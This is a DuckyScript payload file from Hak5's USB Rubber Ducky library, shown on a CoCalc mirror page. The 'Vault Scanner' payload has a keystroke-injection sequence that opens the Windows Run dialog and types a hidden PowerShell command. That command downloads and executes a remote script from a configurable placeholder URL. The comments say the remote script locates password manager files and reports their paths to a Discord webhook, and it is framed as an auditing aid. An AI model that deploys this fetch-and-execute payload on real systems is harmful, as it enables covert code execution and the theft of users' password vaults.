Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/recon/Vault_Scanner/payload.txt
4056 views
1
REM Title: Vault Scanner - Password Manager File Scanner
2
REM Author: Daniel Miranda Barcelona (Excal1bur)
3
REM Description: Scans for password manager files, returning their full path so that the auditor can download them and check the password security level.
4
REM Target: Windows 10/11
5
REM Version: 1.0
6
REM Category: Recon
7
REM Props: Hak5 Community
8
9
REM ================= CONFIGURATION =================
10
REM REQUIRED - Host your Vault_scanner.ps1 file and provide the URL here
11
DEFINE #SCRIPT_URL Example.com
12
13
REM REQUIRED - Your Discord webhook URL, which you must put in the ps1 vault_scanner script.
14
15
DELAY 3000
16
GUI r
17
DELAY 500
18
STRINGLN powershell -WindowStyle Hidden -Command "Invoke-Expression (Invoke-RestMethod '$#SCRIPT_URL$')"
19
20
21
22